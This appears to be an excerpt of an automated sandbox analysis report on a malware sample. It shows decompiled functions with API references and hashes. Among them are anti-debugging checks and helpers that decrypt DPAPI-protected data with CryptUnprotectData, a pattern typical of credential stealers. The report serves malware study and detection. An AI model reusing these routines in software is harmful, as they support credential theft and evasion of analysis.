                                                                                                                              • Opcode Fuzzy Hash: 27e67521fcb4946290682626cc12c91d94e13242a25856a399c3c5753c7069ad
                                                                                                                              • Instruction Fuzzy Hash: FA512774A0022E9FCB14DB94DE85BFEB7B5BF48344F1040B9E509A6280DBB45A84DF95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404354, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E00404354(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4301f4; // 0xe687535
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x431208 = _t6;
				 *0x431204 = _t22;
				 *0x431200 = _t25;
				 *0x4311fc = _t21;
				 *0x4311f8 = _t27;
				 *0x4311f4 = _t26;
				 *0x431220 = ss;
				 *0x431214 = cs;
				 *0x4311f0 = ds;
				 *0x4311ec = es;
				 *0x4311e8 = fs;
				 *0x4311e4 = gs;
				asm("pushfd");
				_pop( *0x431218);
				 *0x43120c =  *_t31;
				 *0x431210 = _v0;
				 *0x43121c =  &_a4;
				 *0x431158 = 0x10001;
				_t11 =  *0x431210; // 0x0
				 *0x43110c = _t11;
				 *0x431100 = 0xc0000409;
				 *0x431104 = 1;
				_t12 =  *0x4301f4; // 0xe687535
				_v812 = _t12;
				_t13 =  *0x4301f8; // 0x44bf19b1
				_v808 = _t13;
				 *0x431150 = IsDebuggerPresent();
				_push(1);
				E0040EC2D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x427278);
				if( *0x431150 == 0) {
					_push(1);
					E0040EC2D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x0040435a
                                                                                                                              0x0040435c
                                                                                                                              0x0040435c
                                                                                                                              0x004071dc
                                                                                                                              0x004071e1
                                                                                                                              0x004071e7
                                                                                                                              0x004071ed
                                                                                                                              0x004071f3
                                                                                                                              0x004071f9
                                                                                                                              0x004071ff
                                                                                                                              0x00407206
                                                                                                                              0x0040720d
                                                                                                                              0x00407214
                                                                                                                              0x0040721b
                                                                                                                              0x00407222
                                                                                                                              0x00407229
                                                                                                                              0x0040722a
                                                                                                                              0x00407233
                                                                                                                              0x0040723b
                                                                                                                              0x00407243
                                                                                                                              0x0040724e
                                                                                                                              0x00407258
                                                                                                                              0x0040725d
                                                                                                                              0x00407262
                                                                                                                              0x0040726c
                                                                                                                              0x00407276
                                                                                                                              0x0040727b
                                                                                                                              0x00407281
                                                                                                                              0x00407286
                                                                                                                              0x00407292
                                                                                                                              0x00407297
                                                                                                                              0x00407299
                                                                                                                              0x004072a1
                                                                                                                              0x004072ac
                                                                                                                              0x004072b9
                                                                                                                              0x004072bb
                                                                                                                              0x004072bd
                                                                                                                              0x004072c2
                                                                                                                              0x004072d6

                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040728C
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004072A1
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00427278), ref: 004072AC
                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 004072C8
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004072CF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2579439406-0
                                                                                                                              • Opcode ID: fb36ba7d8dfb059a8fb948a4e6824210f415b9b34b7e1691bccbcd4c0e549f5a
                                                                                                                              • Instruction ID: db81a0622257a0c1f8b0d9a096f3957374a72d7ea4219b8a0101d48903aebac0
                                                                                                                              • Opcode Fuzzy Hash: fb36ba7d8dfb059a8fb948a4e6824210f415b9b34b7e1691bccbcd4c0e549f5a
                                                                                                                              • Instruction Fuzzy Hash: C72103B8905204DFCB00DF95FD45A853BA0BB0C345F4066BAE619E33B0D7B45A858F5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404354, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E00404354(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4301f4; // 0xe687535
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x431208 = _t6;
				 *0x431204 = _t22;
				 *0x431200 = _t25;
				 *0x4311fc = _t21;
				 *0x4311f8 = _t27;
				 *0x4311f4 = _t26;
				 *0x431220 = ss;
				 *0x431214 = cs;
				 *0x4311f0 = ds;
				 *0x4311ec = es;
				 *0x4311e8 = fs;
				 *0x4311e4 = gs;
				asm("pushfd");
				_pop( *0x431218);
				 *0x43120c =  *_t31;
				 *0x431210 = _v0;
				 *0x43121c =  &_a4;
				 *0x431158 = 0x10001;
				_t11 =  *0x431210; // 0x0
				 *0x43110c = _t11;
				 *0x431100 = 0xc0000409;
				 *0x431104 = 1;
				_t12 =  *0x4301f4; // 0xe687535
				_v812 = _t12;
				_t13 =  *0x4301f8; // 0xf1978aca
				_v808 = _t13;
				 *0x431150 = IsDebuggerPresent();
				_push(1);
				E0040EC2D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x427278);
				if( *0x431150 == 0) {
					_push(1);
					E0040EC2D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x00404354
                                                                                                                              0x0040435a
                                                                                                                              0x0040435c
                                                                                                                              0x0040435c
                                                                                                                              0x004071dc
                                                                                                                              0x004071e1
                                                                                                                              0x004071e7
                                                                                                                              0x004071ed
                                                                                                                              0x004071f3
                                                                                                                              0x004071f9
                                                                                                                              0x004071ff
                                                                                                                              0x00407206
                                                                                                                              0x0040720d
                                                                                                                              0x00407214
                                                                                                                              0x0040721b
                                                                                                                              0x00407222
                                                                                                                              0x00407229
                                                                                                                              0x0040722a
                                                                                                                              0x00407233
                                                                                                                              0x0040723b
                                                                                                                              0x00407243
                                                                                                                              0x0040724e
                                                                                                                              0x00407258
                                                                                                                              0x0040725d
                                                                                                                              0x00407262
                                                                                                                              0x0040726c
                                                                                                                              0x00407276
                                                                                                                              0x0040727b
                                                                                                                              0x00407281
                                                                                                                              0x00407286
                                                                                                                              0x00407292
                                                                                                                              0x00407297
                                                                                                                              0x00407299
                                                                                                                              0x004072a1
                                                                                                                              0x004072ac
                                                                                                                              0x004072b9
                                                                                                                              0x004072bb
                                                                                                                              0x004072bd
                                                                                                                              0x004072c2
                                                                                                                              0x004072d6

                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040728C
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004072A1
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00427278), ref: 004072AC
                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 004072C8
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004072CF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2579439406-0
                                                                                                                              • Opcode ID: fb36ba7d8dfb059a8fb948a4e6824210f415b9b34b7e1691bccbcd4c0e549f5a
                                                                                                                              • Instruction ID: db81a0622257a0c1f8b0d9a096f3957374a72d7ea4219b8a0101d48903aebac0
                                                                                                                              • Opcode Fuzzy Hash: fb36ba7d8dfb059a8fb948a4e6824210f415b9b34b7e1691bccbcd4c0e549f5a
                                                                                                                              • Instruction Fuzzy Hash: C72103B8905204DFCB00DF95FD45A853BA0BB0C345F4066BAE619E33B0D7B45A858F5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041EED0, Relevance: 7.5, APIs: 5, Instructions: 49memoryencryptionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 16%
                                                                                                                              			E0041EED0(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;

				_v8 = HeapAlloc(GetProcessHeap(), 8, 0x400);
				_v20 = _a4 + 1;
				_v24 = _a8 - 1;
				_push( &_v16);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v24);
				if( *0x4327e0() == 0) {
					return 0x42945e;
				}
				WideCharToMultiByte(0, 0, _v12, _v16, _v8, 0x400, 0, 0);
				LocalFree(_v12);
				return _v8;
			}








                                                                                                                              0x0041eeea
                                                                                                                              0x0041eef3
                                                                                                                              0x0041eefc
                                                                                                                              0x0041ef02
                                                                                                                              0x0041ef03
                                                                                                                              0x0041ef05
                                                                                                                              0x0041ef07
                                                                                                                              0x0041ef09
                                                                                                                              0x0041ef0b
                                                                                                                              0x0041ef10
                                                                                                                              0x0041ef19
                                                                                                                              0x00000000
                                                                                                                              0x0041ef4b
                                                                                                                              0x0041ef34
                                                                                                                              0x0041ef3e
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0041EEDD
                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041EEE4
                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0041EF11
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0041EF34
                                                                                                                              • LocalFree.KERNEL32(?), ref: 0041EF3E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3657800372-0
                                                                                                                              • Opcode ID: f7c8286202d5087fabcd1758784238c2633b5219daf29c0a4d3e60d8e81470b6
                                                                                                                              • Instruction ID: 7a7d91f486f3f9dd6e7e10e959326cae4d393e6c11d0001657b75845fcc0ff40
                                                                                                                              • Opcode Fuzzy Hash: f7c8286202d5087fabcd1758784238c2633b5219daf29c0a4d3e60d8e81470b6
                                                                                                                              • Instruction Fuzzy Hash: 7B010075A44208BBDB14DB94DD45FAE77B8EB44704F108155FB05EB2C0D6B0AA418B59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CBA0, Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041CBA0(void* __ecx, char* _a4, void** _a8, long* _a12) {
				int _v8;

				_v8 = 0;
				 *_a8 = 0;
				 *_a12 = 0;
				if(CryptStringToBinaryA(_a4, 0, 1, 0, _a12, 0, 0) != 0) {
					 *_a8 = LocalAlloc(0x40,  *_a12);
					if( *_a8 != 0) {
						_v8 = CryptStringToBinaryA(_a4, 0, 1,  *_a8, _a12, 0, 0);
						if(_v8 == 0) {
							 *_a8 = LocalFree( *_a8);
						}
					}
				}
				return _v8;
			}




                                                                                                                              0x0041cba4
                                                                                                                              0x0041cbae
                                                                                                                              0x0041cbb7
                                                                                                                              0x0041cbd7
                                                                                                                              0x0041cbea
                                                                                                                              0x0041cbf2
                                                                                                                              0x0041cc10
                                                                                                                              0x0041cc17
                                                                                                                              0x0041cc28
                                                                                                                              0x0041cc28
                                                                                                                              0x0041cc17
                                                                                                                              0x0041cbf2
                                                                                                                              0x0041cc30

                                                                                                                              APIs
                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0041CBCF
                                                                                                                              • LocalAlloc.KERNEL32(00000040), ref: 0041CBE1
                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041CC0A
                                                                                                                              • LocalFree.KERNEL32 ref: 0041CC1F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4291131564-0
                                                                                                                              • Opcode ID: 59bee1e0bc0429589c7e47e899a4c77139c61073456810a9bffb9ff8eaa0a8b1
                                                                                                                              • Instruction ID: 56bd40cd4ba821fc38e6c7a17e62a6f0de69d385e2ef2c3fb7c3c5633154ad88
                                                                                                                              • Opcode Fuzzy Hash: 59bee1e0bc0429589c7e47e899a4c77139c61073456810a9bffb9ff8eaa0a8b1
                                                                                                                              • Instruction Fuzzy Hash: F411D2B4240308AFEB10CF64CC95FAA77B5FB88B00F208459F9199B3D0D7B5A941CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CD30, Relevance: 4.6, APIs: 3, Instructions: 61encryptionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 25%
                                                                                                                              			E0041CD30(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_v8 = E0040537B(__edx, __edi, __esi, _a8);
				E00409240(_v8, _a4, _a8);
				_v12 = _a4;
				_v16 = _a8;
				_v28 = E0040537B(_a8, __edi, __esi, _a8);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v16);
				if( *0x4327e0() == 0) {
					return 0;
				}
				_v32 = 0;
				while(_v32 < _v24) {
					 *((char*)(_v28 + _v32)) =  *((intOrPtr*)(_v20 + _v32));
					_v32 = _v32 + 1;
				}
				 *((char*)(_v28 + _v24)) = 0;
				return _v28;
			}










                                                                                                                              0x0041cd42
                                                                                                                              0x0041cd51
                                                                                                                              0x0041cd5c
                                                                                                                              0x0041cd62
                                                                                                                              0x0041cd71
                                                                                                                              0x0041cd77
                                                                                                                              0x0041cd78
                                                                                                                              0x0041cd7a
                                                                                                                              0x0041cd7c
                                                                                                                              0x0041cd7e
                                                                                                                              0x0041cd80
                                                                                                                              0x0041cd85
                                                                                                                              0x0041cd8e
                                                                                                                              0x00000000
                                                                                                                              0x0041cdcc
                                                                                                                              0x0041cd90
                                                                                                                              0x0041cda2
                                                                                                                              0x0041cdb8
                                                                                                                              0x0041cd9f
                                                                                                                              0x0041cd9f
                                                                                                                              0x0041cdc2
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 0041CD3A
                                                                                                                                • Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
                                                                                                                                • Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
                                                                                                                                • Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0
                                                                                                                              • _malloc.LIBCMT ref: 0041CD69
                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041CD86
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _malloc$AllocateCryptDataHeapUnprotect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1951378374-0
                                                                                                                              • Opcode ID: 68a5aae102f9efea595c834b1cc7f895f0ca6c2316e39983b41f57d4bf4d194e
                                                                                                                              • Instruction ID: 8a43d0c20a99cd5a9278e18ba334847751e1c93ca7c103147f03c8bf539e0bba
                                                                                                                              • Opcode Fuzzy Hash: 68a5aae102f9efea595c834b1cc7f895f0ca6c2316e39983b41f57d4bf4d194e
                                                                                                                              • Instruction Fuzzy Hash: 98111FB5D04109EFCF00DF99D881AEFBBB4EF48304F148569E919A7341D638AA41CF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040E5C7, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040E5C7() {

				SetUnhandledExceptionFilter(E0040E585);
				return 0;
			}



                                                                                                                              0x0040e5cc
                                                                                                                              0x0040e5d4

                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000E585), ref: 0040E5CC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: cc4c5f65d686995c6eac9155ab9df3efbb6f948664e4aacc6aa127ea312579cb
                                                                                                                              • Instruction ID: a5dc8636cf60ae7a0a84250136d9b4b03a71c5cc7ffb9929d82e7c1e62d0f7e1
                                                                                                                              • Opcode Fuzzy Hash: cc4c5f65d686995c6eac9155ab9df3efbb6f948664e4aacc6aa127ea312579cb
                                                                                                                              • Instruction Fuzzy Hash: DA9002A035614056C61017F15E196052D946E586067910CF97611E50D4FA64401A5519
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004196D0, Relevance: .0, Instructions: 15COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004196D0(void* __ecx) {
				intOrPtr _v8;

				_v8 = 0;
				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				return _v8;
			}




                                                                                                                              0x004196d4
                                                                                                                              0x004196ee
                                                                                                                              0x004196f7

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B750, Relevance: .0, Instructions: 7COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041B750() {

				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					return 1;
				} else {
					return 0;
				}
			}



                                                                                                                              0x0041b75a
                                                                                                                              0x0041b764
                                                                                                                              0x0041b75c
                                                                                                                              0x0041b75e
                                                                                                                              0x0041b75e

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                                                                                              • Instruction ID: e339c26aa805b3dbdccb0bbec68ffa90cfb8b186f9bf68622fd8779a8eafd4f1
                                                                                                                              • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                                                                                              • Instruction Fuzzy Hash: D5B092706124804AEB1287248415B4276E0A780B01F8984E0A00986982C39C9A849104
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00408594, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 62%
                                                                                                                              			E00408594(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x431444 = GetProcAddress(_t35, "FlsAlloc");
					 *0x431448 = GetProcAddress(_t35, "FlsGetValue");
					 *0x43144c = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x431444;
					_t39 = TlsSetValue;
					 *0x431450 = _t7;
					if( *0x431444 == 0) {
						L6:
						 *0x431448 = TlsGetValue;
						 *0x431444 = E004082A4;
						 *0x43144c = _t39;
						 *0x431450 = TlsFree;
					} else {
						__eflags =  *0x431448;
						if( *0x431448 == 0) {
							goto L6;
						} else {
							__eflags =  *0x43144c;
							if( *0x43144c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x430978 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x431448);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00408980();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x431444);
							 *0x431444 = _t14;
							_t15 =  *_t41( *0x431448);
							 *0x431448 = _t15;
							_t16 =  *_t41( *0x43144c);
							 *0x43144c = _t16;
							 *0x431450 =  *_t41( *0x431450);
							_t18 = E0040B0C5();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004082E1();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x431444, E00408465);
								 *0x430974 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E0040880C(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x43144c,  *0x430974, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E0040831E(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004082E1();
					return 0;
				}
			}





















                                                                                                                              0x00408594
                                                                                                                              0x004085a2
                                                                                                                              0x004085a6
                                                                                                                              0x004085c6
                                                                                                                              0x004085d3
                                                                                                                              0x004085e0
                                                                                                                              0x004085e5
                                                                                                                              0x004085e7
                                                                                                                              0x004085ee
                                                                                                                              0x004085f4
                                                                                                                              0x004085f9
                                                                                                                              0x00408611
                                                                                                                              0x00408616
                                                                                                                              0x00408620
                                                                                                                              0x0040862a
                                                                                                                              0x00408630
                                                                                                                              0x004085fb
                                                                                                                              0x004085fb
                                                                                                                              0x00408602
                                                                                                                              0x00000000
                                                                                                                              0x00408604
                                                                                                                              0x00408604
                                                                                                                              0x0040860b
                                                                                                                              0x00000000
                                                                                                                              0x0040860d
                                                                                                                              0x0040860d
                                                                                                                              0x0040860f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040860f
                                                                                                                              0x0040860b
                                                                                                                              0x00408602
                                                                                                                              0x00408635
                                                                                                                              0x0040863b
                                                                                                                              0x00408640
                                                                                                                              0x00408643
                                                                                                                              0x0040870a
                                                                                                                              0x0040870a
                                                                                                                              0x0040870a
                                                                                                                              0x00408649
                                                                                                                              0x00408650
                                                                                                                              0x00408652
                                                                                                                              0x00408654
                                                                                                                              0x00000000
                                                                                                                              0x0040865a
                                                                                                                              0x0040865a
                                                                                                                              0x00408665
                                                                                                                              0x0040866b
                                                                                                                              0x00408673
                                                                                                                              0x00408678
                                                                                                                              0x00408680
                                                                                                                              0x00408685
                                                                                                                              0x0040868d
                                                                                                                              0x00408694
                                                                                                                              0x00408699
                                                                                                                              0x0040869e
                                                                                                                              0x004086a0
                                                                                                                              0x00408705
                                                                                                                              0x00408705
                                                                                                                              0x00000000
                                                                                                                              0x004086a2
                                                                                                                              0x004086a2
                                                                                                                              0x004086b5
                                                                                                                              0x004086b7
                                                                                                                              0x004086bc
                                                                                                                              0x004086bf
                                                                                                                              0x00000000
                                                                                                                              0x004086c1
                                                                                                                              0x004086cd
                                                                                                                              0x004086d1
                                                                                                                              0x004086d3
                                                                                                                              0x00000000
                                                                                                                              0x004086d5
                                                                                                                              0x004086e6
                                                                                                                              0x004086e8
                                                                                                                              0x00000000
                                                                                                                              0x004086ea
                                                                                                                              0x004086ea
                                                                                                                              0x004086ec
                                                                                                                              0x004086ed
                                                                                                                              0x004086f4
                                                                                                                              0x004086fa
                                                                                                                              0x004086fe
                                                                                                                              0x00408702
                                                                                                                              0x00408702
                                                                                                                              0x004086e8
                                                                                                                              0x004086d3
                                                                                                                              0x004086bf
                                                                                                                              0x004086a0
                                                                                                                              0x00408654
                                                                                                                              0x0040870e
                                                                                                                              0x004085a8
                                                                                                                              0x004085a8
                                                                                                                              0x004085b0
                                                                                                                              0x004085b0

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00407098), ref: 0040859C
                                                                                                                              • __mtterm.LIBCMT ref: 004085A8
                                                                                                                                • Part of subcall function 004082E1: DecodePointer.KERNEL32(FFFFFFFF,0040870A,?,00407098), ref: 004082F2
                                                                                                                                • Part of subcall function 004082E1: TlsFree.KERNEL32(FFFFFFFF,0040870A,?,00407098), ref: 0040830C
                                                                                                                                • Part of subcall function 004082E1: DeleteCriticalSection.KERNEL32(00000000,00000000,77E4F3A0,?,0040870A,?,00407098), ref: 0040B12C
                                                                                                                                • Part of subcall function 004082E1: _free.LIBCMT ref: 0040B12F
